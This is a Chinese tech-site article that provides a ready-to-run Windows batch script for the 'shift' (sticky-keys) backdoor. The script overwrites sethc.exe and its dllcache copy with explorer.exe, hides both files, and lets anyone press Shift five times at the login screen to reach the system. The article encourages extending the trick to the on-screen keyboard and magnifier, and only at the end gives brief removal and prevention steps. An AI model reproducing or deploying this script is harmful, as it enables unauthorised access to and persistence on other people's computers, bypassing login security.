当前位置：GHOST系统之家>电脑问题 > shift后门批处理代码与shift后门清除方法分享

shift后门批处理代码与shift后门清除方法分享

来源：Ghost系统之家浏览：时间：2022-09-24 08:07:47

在cmd下输入以下命令...
下面再打开记事本把底下的代码粘贴进去。

复制代码代码如下:
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门
echo.sproink
@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕！
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

其实原理很简单，就是利用了explorer.exe 这个资源管理器进程替换调用的shift 默认启动程序，然后还覆盖了windows的文件保护原文件（防止文件保护系统检测到文件修改，会还原这些原来的程序，造成copy文件失去作用），当调用shift是其实调用的真正程序是桌面进程。Lyon: 同理，你也可以利用此方法替换屏幕键盘及放大镜和组合键：win+u,其它自己可以拓展思路^_^
下面介绍如何清除此后门...
打开控制面板－－辅助功能选项－－粘滞键－－设置－－去掉使用快捷键的勾

还有要改下copy.exe的权限，不过在这里推荐大家把c盘所有的程序都改下，只有administrator才能访问

shift后门的预防解决办法：预防很简单的，连敲5次shift，然后在弹出的设置里面取消连滞键
已经中了的话
attrib c:\windows\system32\sethc.exe -h
attrib c:\windows\system32\dllcache\sethc.exe -h
拷贝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目录下；拷贝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目录下
还有就是在c:\windows\system32及c:\windows\system32\dllcache\下找到sethc.exe 禁止所有用户权限或拒绝访问等，也可:)建议利用前者恢复。。。
收工！

标签：